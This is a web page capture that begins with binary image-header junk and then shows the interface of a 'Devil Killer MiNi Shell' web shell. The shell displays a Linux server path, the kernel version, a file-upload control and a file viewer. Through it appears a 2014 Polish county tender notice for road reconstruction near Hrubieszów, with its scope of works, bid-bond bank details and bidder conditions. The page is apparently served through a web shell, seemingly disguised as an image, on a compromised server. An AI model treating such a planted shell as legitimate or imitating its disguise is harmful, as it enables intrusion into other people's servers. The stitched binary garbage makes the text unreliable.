JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/76046-N-2014.html

<p class="kh_header"><b>Hrubieszów: Przebudowa drogi powiatowej Nr 3432 L Hrubieszów- Kryłów
- Dołhobyczów- Granica Państwa ( etap II)</b><br>
<b>Numer ogłoszenia: 76046 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Hrubieszowski , ul. Narutowicza 34, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6965069, faks 084 6963856.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 3432 L Hrubieszów- Kryłów
- Dołhobyczów- Granica Państwa ( etap II).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi powiatowej Nr 3432 L Hrubieszów-Kryłów- Dołhobyczów- Granica Państwa -etap II o łącznej długości 6244 mb w km 17+456 do 19+411 oraz w km 20+411 do 24+700.   
Zakres robót przewidzianych do wykonania  obejmuje miedzy innymi:
- roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym - 6.244 km
- usunięcie warstwy ziemi urodzajnej (humusu) o grubości do 15 cm za pomocą spycharek- 40502 m2
- roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. I-III w ziemi uprzednio zmag. w hałdach z transp. urobku na odl. 1 km sam.samowyład.- wywóz humusu 6076 m3
-wywiezienie gruzu, kory asfaltowej z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odleg. 1 km 311.19 m3
- nawierzchnie z płyt żelbetowych pełnych o pow.do 3 m2 - rozebranie 22.8 m2
- rozebranie nawierzchni z mas mineralno-bitumicznych gr. 16 cm mechanicznie-375 m2
- rozebranie chodników z płyt betonowych o wymiarach 35x35x5 cm na podsypce piaskowej-369 m2
- ręczne rozebranie nawierzchni z kostki brukowej na podsypce piaskowej - 1908 m2
- rozebranie krawężników betonowych na podsypce cementowo- piaskowej- 1722 m
- rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej-1299 m
- rozebranie przepustów rurowych - rury betonowe o śr.60 cm-12 m
- rozebranie barier drogowych żelbetowych zakopiańskich-403 m
- rozebranie barier drogowych stalowych-453 m
- rozebranie poręczy ochronnych U-11a - 8.2 m
- rozebranie barier drogowych typu U-14a -13.4 m
- rozebranie ław pod krawężniki z betonu - 141 m3
- mechaniczne karczowanie zagajników rzadkich od 10% do 30% powierzchni- 0.012 ha
- karczowanie pni o śr. 66-75 cm w gruntach kat.III-IV o normalnej wilgotności - szt. 5
- karczowanie pni o śr. 76-100 cm w gruntach kat.III-IV o normalnej wilgotności- szt. 10
- karczowanie pni o śr. 101-130 cm koparką podsiębierną w gruntach kat.III-IV o normalnej wilgotności - szt. 15
- wykopy oraz przekopy o głęb.do 3.0 m wyk.na odkład koparkami podsiębiernymi o poj.łyżki 0.25 do 0.60 m3 w gr.kat. III-IV  3396.73 m3
- roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. I-II z transp.urobku na odl.do 1 km sam.samowyład. -  678.6 m3
- roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. I-II z transp.urobku na odl.do 1 km sam.samowyład. - dowóz gruntu - 6417.7 m3
- formowanie i zagęszczanie nasypów o wys. do 3.0 m spycharkami w gruncie kat. I-II-  10455 m3
- profilowanie i zagęszczanie podłoża wykonywane mechanicznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni - 35351m2
- warstwy odsączające zagęszczane mechanicznie o gr.10 cm - 5226 m2
- warstwy odsączające wykonane i zagęszczane mechanicznie o gr.15 cm Krotność -6052 m2
- podbudowy betonowe 2,5 MPa gr.12 cm pielęgnowane piaskiem i wodą- 794 m2
- podbudowy betonowe 2,5 MPa gr.15 cm pielęgnowane piaskiem i wodą - 794 m2
- warstwa dolna podbudowy z kruszyw łamanych gr. 15cm- 5564 m2
- warstwa dolna podbudowy z kruszyw łamanych gr. 20cm- 8934 m2
- roboty remontowe - frezowanie nawierzchni bitumicznej o gr. do 3 cm z wywozem materiału z rozbiórki na odl.do 1 km - 1393 m2
- wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową mechaniczne - 5094 t
- wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym z zagęszczeniem mechanicznym - śr.grub.warstwy po zagęszcz.do 10 cm  600 m3
- oczyszczenie mechaniczne nawierzchni drogowych bitumicznych-  105934 m2
- skropienie emulsja asfaltową nawierzchni drogowych - 105934 m2
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 3 cm (warstwa wiążąca) - 15225 m2
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa wzmacniająca) - 8002 m2
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 6 cm (warstwa wiążąca), (warstwa wzmacniająca)- 38470m2
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa ścieralna) - 40865 m2
- nawierzchnia z kostki brukowej betonowej grubości 8 cm - kolor - na podsypce cementowo-piaskowej grub.,5 cm z wypełnieniem spoin piaskiem- 3278 m2
- chodniki z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej grub.4 cm z wypełnieniem spoin piaskiem-  13240 m2
- nawierzchnia z kostki brukowej betonowej grubości 8 cm - kolor - na podsypce cementowo-piaskowej grub.3 cm z wypełnieniem spoin piaskiem - 684 m2 
- nawierzchnia z kostki brukowej betonowej grubości 8 cm - szarej - na podsypce cementowo-piaskowej grub.3 cm z wypełnieniem spoin piaskiem - 1199 m2
- humusowanie skarp z obsianiem przy grubości warstwy humusu 5 cm.-  22187 m2
- ułożenie ścieków prefabrykowanych korytkowych lub trójkątnych na podbudowie-  127 m
- przepusty rurowe pod zjazdami - ławy fundamentowe żwirowe  261 m3
- przepusty rurowe pod zjazdami - rury betonowe o średnicy 50 cm - 1050 m
- oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe ciągłe malowane mechanicznie  948.4 m2
- oznakowanie poziome jezdni farbą chlorokauczukową - inne malowane ręcznie - 123.8 m2
- pionowe znaki drogowe - słupki z rur stalowych szt. 57
- pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. do 0.3 m2 szt. 60
- poręcze ochronne typu u-11a - 36 m
- bariery ochronne stalowe typu U-14a - 461 m
- krawężniki betonowe wystające o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej - 8202 m
- krawężniki betonowe leżący o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo piaskowej-  3237 m
- krawężniki betonowe o wymiarach 20x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej- 342 m
- chodniki z kostki brukowej betonowej grubości 6 szarej cm na podsypce cementowo-piaskowej  z wypełnieniem spoin piaskiem  2621 m2
- chodniki z kostki brukowej betonowej grubości 6 kolorowej cm na podsypce cementowo-piaskowej  z wypełnieniem spoin piaskiem - 749 m2
- obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową-  8291 m
- przepusty rurowe pod zjazdami - ławy fundamentowe żwirowe - zatoki, perony-  15 m3
- przepusty rurowe pod zjazdami - rury betonowe o średnicy 60 cm-   88 m
- przepusty rurowe pod zjazdami - rury betonowe o średnicy 60 cm - skosy  8 m
- ścieki z kostki brukowej betonowej grub. 8 cm na podsypce cementowo-piaskowej-  396.4 m2
W ramach usunięcia kolizji linii energetycznych i przyłączy z przebudowywana droga przewidziane jest między innymi:
- demontaż  przewodów, przyłączy i przerzutów, z samochodu specjalnego, długość  przyłącza 20m, 4 przewody w przyłączu- 1 kpl
-montaż przyłącza przewodami izolowanymi typu AsXSn lub podobnymi, z udziałem podnośnika samochodowego, przewód 4x25mm2- 1 szt
- pomiar rezystancji izolacji przewodu AsXSn przed montażem analiza indywidualna ZKE- 1 pomiar
- słupy żelbetowe linii NN, demontaż słupa pojedynczego z ustrojami- 1 szt
- montaż  i stawianie słupów linii napowietrznej NN  z żerdzi wirowanych, słup pojedynczy do 12,0m E-12/2,5 sł. 52- 1 słup
- demontaż przewodów linii niskiego napięcia na słupach żelbetowych z przeznaczeniem do ponownego montażu, bez demontażu  izolacji, przewody 35-50mm2 od słupa nr 52 do słupa nr 53- 0,118 km
- montaż przewodów izolowanych linii napowietrznej NN typu AsXSn lub podobnych, przewód 4x50mm2- 0,12 km
- montaż i stawianie słupów linii napowietrznej NN z żerdzi wirowanych, hak wieszakowy  z uchwytem, SOT klasa 2 Fi16- 2 szt
- zabezpieczenie podziemnej części słupów- 1 szt
-słupy żelbetowe linii NN, demontaż słupa rozkracznego- 1 szt
- montaż i stawianie słupów linii napowietrznej NN z żerdzi wirowanych, słup pojedynczy do 12,0m E-12/12 sł. 33- 1 słup
- demontaż przewodów linii niskiego napięcia na słupach żelbetowych z przeznaczeniem do ponownego montażu, z demontażem izolacji, przewody 70-90mm2 od st. trafo do słupa nr 32 
- 0,102 km
- demontaż przewodów linii niskiego napięcia na słupach żelbetowych z przeznaczeniem do ponownego montażu, bez demontażu izolacji, przewody do 25mm2 od st. trafo do słupa nr 32
- 0,102 km
- montaż zabezpieczenia wzdłużnego, z rozłącznikiem SZ 50, SZ 2.2 125A, 500V - Demontaż RSA ANALOGIA - 1 szt
- montaż  rozłącznika bezpiecznikowego RSA- 1 szt
- montaż przewodów izolowanych linii napowietrznej NN typu AsXSn lub podobnych, przewód 4x95mm2 ponowny montaż- 0,102 km
- montaż przewodów izolowanych linii napowietrznej NN typu AsXSn lub podobnych, przewód 2x25mm2- 0,102 km
- montaż konstrukcji stalowych i osprzętu linii napowietrznej nn, konstrukcja Km 1 sł nr 33- 1 szt
- montaż przewodów nieizolowanych linii napowietrznej NN, przewód do 50mm2- 0,05 km
 -montaż muf przelotowych - ANALOGIA wykonanie łączenia przewodu ASXSN 4x95 - 4 szt
- montaż muf przelotowych - ANALOGIA wykonanie łączenia przewodu ASXSN 2x25R- 2 szt
- montaż i stawianie słupów linii napowietrznej NN z żerdzi wirowanych, hak wieszakowy z uchwytem, SOT klasa 2- 2 szt
- układanie kabli na słupach betonowych, bezpośrednio na słupie, masa do 3,0kg/m, w uchwytach na stacji- 2 m
- układanie kabli na słupach betonowych, do rur osłonowych mocowanych na słupie, masa do 3,0kg/m, w uchwytach na stacji-2 m
- układanie kabli na słupach betonowych, bezpośrednio na słupie, masa do 0,5kg/m, w uchwytach na stacji-2 m
- układanie kabli na słupach betonowych, do rur osłonowych mocowanych na słupie, masa do 1,0kg/m, w uchwytach- 1 m
- montaż ogranicznika przepięć - na słupie nr 33- 3 szt
- pomiar rezystancji izolacji przewodu AsXSn przed montażem analiza indywidualna ZKE- 2 pomiary
- zabezpieczenie podziemnej części słupów- 1 szt

Do obowiązków Wykonawcy należy wykonanie czasowej organizacji ruchu na czas robót oraz  oznakowania robót zgodnie z projektem.
Zamawiający informuje, że jeśli w dokumentacji projektowej użyte zostały nazwy materiałów i urządzeń, to nie są one obowiązujące i należy je traktować jako propozycje projektanta. Wykonawca może zastosować materiały i urządzenia równoważne o parametrach 
nie gorszych od proponowanych w projekcie.
Wykonawca ma obowiązek wytyczyć geodezyjnie roboty w terenie i  wykonać geodezyjną inwentaryzację powykonawczą.

Zamawiający nie dopuszcza możliwości składania ofert częściowych
Zakres robót określony został w projektach budowlanych i wykonawczych będącymi załącznikiem do SIWZ- przebudowa drogi i likwidacja kolizji linii energetycznej. Ponadto Wykonawca zobowiązany będzie do prowadzenia prac zgodnie z warunkami określonymi 
w  wydanym pozwoleniu na przebudowę oraz decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia, oraz warunkami decyzji Wojewódzkiego  Urzędu Ochrony Zabytków w Lublinie Delegatura w Zamościu z dnia 08.07.2011 r.
 Przedmiar robót ma charakter pomocniczy. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z dokumentacją projektową. Z uwagi na to, że umowa na roboty będzie umową ryczałtową w przypadku wystąpienia w trakcie prowadzenia robót większej ilości robót w jakiejkolwiek pozycji nie będzie to mogło być uznane za roboty dodatkowe 
z żądaniem dodatkowego wynagrodzenia. Ewentualny brak w przedmiarze pewnych robót koniecznych do wykonania na podstawie dokumentacji projektowej (w tym w projekcie wykonawczym) nie zwalnia Wykonawcy od obowiązku ich wykonania na podstawie projektu, w cenie umownej. Ilości robót w przedmiarze Wykonawca ma prawo skorygować do wielkości według własnych obliczeń na postawie projektu wykonawczego oraz ST. 
W przypadku robót związanych z likwidacją kolizji z linią energetyczną właściciel sieci wymaga wpłaty kaucji w celu zabezpieczenia prawidłowego wykonania robót. 
Zamawiający dokona wpłaty kaucji we własnym zakresie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 300.000,00 zł ( słownie: trzysta  tysięcy zł 00/100).
 Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a) pieniądzu, przelewem na rachunek bankowy w PKO BP S.A. Nr konta 12 1020 5356 0000 1102 0143 5817 dopiskiem Wadium - przetarg na przebudowę drogi powiatowej Nr 3432 L Hrubieszów- Kryłów- Dołhobyczów- Granica Państwa ( etap II) . 
b) poręczeniach bankowych;
c) poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d) gwarancjach bankowych;
e) gwarancjach ubezpieczeniowych;
f) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w ww. formie powinno być wystawione na: Powiat hrubieszowski, ul. Narutowicza 34, 22-500 Hrubieszów. 
W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp. 
W przypadku wniesienia  wadium w formie innej niż pieniądz, oryginał dokumentu potwierdzającego wniesienie wadium i jego kopie potwierdzona za zgodność oryginałem należy dołączyć do oferty. Oryginał dokumentu należy dołączyć w sposób umożliwiający jego zwrot bez uszkodzenia. 
Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w  rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert. Potwierdzenie wniesienia wadium należy dołączyć do oferty.
Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy Pzp
Zgodnie z art. 46 ust. 4a i 5 ustawy pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadkach wskazanych w ustawie pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku  w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy niezbędnej wiedzy i doświadczenia. Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat, licząc wstecz od daty składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał  co najmniej jedną(1) robotę budowlaną polegają na budowie lub przebudowie drogi publicznej w rozumieniu ustawy z dnia 21 marca 1985 r. 
o drogach publicznych ( t.j. Dz. U. z 2013 r. poz.260 z późn. zm.) o wartości robót minimum 7 000000,00 zł brutto (słownie: siedem milionów zł) oraz minimalnej długości (trzy) kilometry  w ramach jednej umowy, co potwierdzi załączając dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Dowodem na powyższe będą poświadczenie lub  inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunek wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia poprzez wykazanie, że Wykonawca:
- dysponuje co najmniej (1) jedną osobą posiadającą uprawnienia budowlane do sprawowania funkcji kierownika budowy  w  specjalności drogowej
- dysponuje co najmniej (1) jedną osobą posiadającą uprawnienia budowlane do sprawowania funkcji kierownika robót w   specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Uprawnienia budowlane, o których mowa powinny być zgodne z ustawą z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2006 r., Nr 83, poz. 578 z późn. zm.). Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów. 
W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394 z późn
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunek wykonawca spełnił, stosując formułę: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
